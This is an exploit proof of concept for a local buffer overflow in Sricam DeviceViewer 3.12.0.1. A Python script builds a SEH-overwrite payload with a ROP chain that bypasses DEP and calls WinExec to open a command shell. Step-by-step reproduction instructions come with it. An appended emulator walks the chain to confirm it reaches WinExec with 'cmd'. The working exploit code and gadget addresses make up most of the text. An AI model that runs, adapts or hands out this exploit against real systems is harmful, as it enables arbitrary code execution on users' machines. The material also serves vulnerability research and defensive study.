Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)

# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1

# Steps to reproduce:
# 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
# 2. Change the related address in the PoC
# 3. Generate the payload using the PoC
# 4. Log in the Sricam DeviceViewer application
# 5. Go to System Configuration -> User Management
# 6. Put the content of the generated file in User Info -> Username
# 7. Click on Add
# 8. A command shell will appear
#
# Note: kernel32.dll is ASLR-enabled on Windows 7, so the WinExec address read in
# step 1 is only valid until the next reboot; repeat steps 1-3 after every reboot
# or the chain will return into an unmapped or wrong address instead of WinExec.

#!/usr/bin/python
# Runs under Python 2 and 3: the payload is built and written as bytes.
from struct import pack

def create_rop_chain():
    rops = [
        0x6a1142aa,  # XOR EDX,EDX # RETN
        0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
        0x6ae9c126,  # &Writable location [avutil-50.dll]
        0x6a5dac8a,  # POP EAX # RETN
        0xff9b929d,  # NEG "cmd\0"
        0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
        0x6994766b,  # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a18e062,  # ADD ESP, 10 # RETN ---> ESI
        0x6a2420ea,  # ROP NOP ---> EDI
        0x6a45e446,  # XCHG EAX,EDX # RETN [avcodec-54.dll]
        0x6a29d716,  # XCHG EAX,ECX # RETN [avcodec-54.dll] ## ECX = ascii "cmd\0"
        0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
        0x6a36264a,  # CALL EBX ## EDX = CALL EBX
        0x6a5dac8a,  # POP EAX # RETN
        0x76e33231,  # ptr to WinExec() [kernel32.dll] #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the application
        0x6a150411,  # XCHG EAX,EBX # RETN [avcodec-54.dll] ## EBX = &WinExec
        0x6a5dac8a,  # POP EAX # RETN
        0xffffffff,  # -0x00000001-> ebx
        0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll] ## EAX = 1
        0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
    ]
    return b''.join(pack('<I', _) for _ in rops)

def nops(length):
    return b"\x90" * length

rop_chain = create_rop_chain()
maxlen = 5000

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)

# Don't care nseh
nseh = nops(4)

payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec)  # More junk to reach 5000

print("Exploit Length: " + str(len(payload)))

try:
    fname = "exprop.txt"
    exploit = open(fname, "wb")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
except (IOError, OSError) as e:
    print("[!] Error creating the file: " + str(e))
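To check what the chain above does without attaching a debugger, here is a small register/stack emulator. It is an added example and not part of the author's PoC: it walks the chain dword by dword using only the gadget semantics the chain's own comments state (the av* DLLs are not disassembled), and reports which function the chain finally calls and with which stack arguments. The gadget addresses, the writable slot in avutil-50.dll and the hard-coded WinExec pointer are copied from the PoC; STACK_BASE and the 0x100 offset below the chain are assumptions made only so PUSH EAX and PUSHAD have somewhere to write. Call run_chain() to get the resulting WinExec frame; passing a chain whose kernel32 pointer is stale (what a reboot does under ASLR) makes it raise instead.

```python
"""Walk the PoC's ROP chain on a small x86 register/stack model (added example)."""
from struct import pack, unpack

MASK = 0xffffffff
WINEXEC = 0x76e33231     # kernel32!WinExec as hard-coded in the PoC (ASLR moves it each boot)
WRITABLE = 0x6ae9c126    # writable dword in avutil-50.dll that receives "cmd\0"
NOP = 0x6a2420ea         # RETN-only gadget the PoC uses as ROP NOP
STACK_BASE = 0x0018f000  # assumed address of the pivoted stack, emulation only
CHAIN_OFF = 0x100        # room below the chain for PUSH EAX / PUSHAD
POP_REG = {0x6a569810: 'edx', 0x6a5dac8a: 'eax'}                      # POP reg # RETN
XCHG_EAX = {0x6a45e446: 'edx', 0x6a29d716: 'ecx', 0x6a150411: 'ebx'}  # XCHG EAX,reg # RETN

# The PoC's 40 dwords in the PoC's order; only the NOP runs are collapsed.
CHAIN = ([0x6a1142aa,                # XOR EDX,EDX # RETN
          0x6a569810, WRITABLE,      # POP EDX # RETN
          0x6a5dac8a, 0xff9b929d,    # POP EAX # RETN  (NEG of "cmd\0")
          0x6a2420e8,                # NEG EAX # RETN
          0x6994766b]                # PUSH EAX # MOV [EDX],EAX # ADD ESP,3C # POP EBX/ESI/EDI/EBP # RETN
         + [NOP] * 16
         + [0x6a18e062, NOP,         # ADD ESP,10 # RETN ; ROP NOP
            0x6a45e446, 0x6a29d716,  # XCHG EAX,EDX # RETN ; XCHG EAX,ECX # RETN
            0x6a569810, 0x6a36264a,  # POP EDX # RETN  (EDX = CALL EBX)
            0x6a5dac8a, WINEXEC,     # POP EAX # RETN
            0x6a150411,              # XCHG EAX,EBX # RETN
            0x6a5dac8a, 0xffffffff,  # POP EAX # RETN
            0x6a2420e8,              # NEG EAX # RETN  (EAX = 1 = SW_SHOWNORMAL)
            0x6a5eb992]              # PUSHAD # RETN
         + [NOP] * 4)


class Emu:
    def __init__(self, chain):
        self.mem = {}                            # sparse, byte-addressed
        self.r = dict(eax=0, ecx=0, edx=0, ebx=0, ebp=0, esi=0, edi=0,
                      esp=STACK_BASE + CHAIN_OFF)  # the pivot's RETN left ESP at the chain
        for i, dword in enumerate(chain):
            self.w32(self.r['esp'] + 4 * i, dword)

    def r32(self, a):
        return unpack('<I', bytes(self.mem.get(a + i, 0) for i in range(4)))[0]

    def w32(self, a, v):
        for i, b in enumerate(pack('<I', v & MASK)):
            self.mem[a + i] = b

    def pop(self):
        v = self.r32(self.r['esp'])
        self.r['esp'] += 4
        return v

    def push(self, v):
        self.r['esp'] -= 4
        self.w32(self.r['esp'], v)

    def step(self, eip):
        """Run one gadget; return the next EIP (its RETN target, or EBX for CALL EBX)."""
        r = self.r
        if eip == 0x6a1142aa:
            r['edx'] = 0
        elif eip in POP_REG:
            r[POP_REG[eip]] = self.pop()
        elif eip == 0x6a2420e8:
            r['eax'] = (-r['eax']) & MASK
        elif eip == 0x6994766b:
            self.push(r['eax'])
            self.w32(r['edx'], r['eax'])         # "cmd\0" lands in the writable slot
            r['esp'] += 0x3c
            for reg in ('ebx', 'esi', 'edi', 'ebp'):
                r[reg] = self.pop()
        elif eip == NOP:
            pass
        elif eip == 0x6a18e062:
            r['esp'] += 0x10
        elif eip in XCHG_EAX:
            r['eax'], r[XCHG_EAX[eip]] = r[XCHG_EAX[eip]], r['eax']
        elif eip == 0x6a5eb992:                  # PUSHAD: EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI
            for v in (r['eax'], r['ecx'], r['edx'], r['ebx'], r['esp'], r['ebp'], r['esi'], r['edi']):
                self.push(v)
        elif eip == 0x6a36264a:                  # CALL EBX (FF D3): push return address, jump to EBX
            self.push(eip + 2)
            return r['ebx']
        else:
            raise RuntimeError('EIP %#x is not a gadget this chain uses' % eip)
        return self.pop()                        # every other gadget ends with RETN

    def run(self, max_steps=100):
        eip = self.pop()
        for _ in range(max_steps):
            if eip == WINEXEC:                   # stdcall frame: [ESP]=ret, [ESP+4]=lpCmdLine, [ESP+8]=uCmdShow
                esp = self.r['esp']
                lp = self.r32(esp + 4)
                return {'lpCmdLine': lp, 'cmd': pack('<I', self.r32(lp)).split(b'\0')[0],
                        'uCmdShow': self.r32(esp + 8), 'edi': self.r['edi']}
            eip = self.step(eip)
        raise RuntimeError('chain never reached WinExec')


def run_chain(chain=CHAIN):
    """Return the WinExec call the chain produces, or raise if the chain derails."""
    return Emu(chain).run()
```

The returned dict shows the two things the PUSHAD trick has to get right: at the moment CALL EBX lands in WinExec, [ESP+4] is the writable slot now holding "cmd\0" and [ESP+8] is 1. The 'edi' entry shows which gadget the POP EBX/ESI/EDI/EBP tail of the first gadget left in EDI; that is the register PUSHAD pushes last, so it is the first RETN target after PUSHAD and has to be the ADD ESP,10 gadget for the frame to line up.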
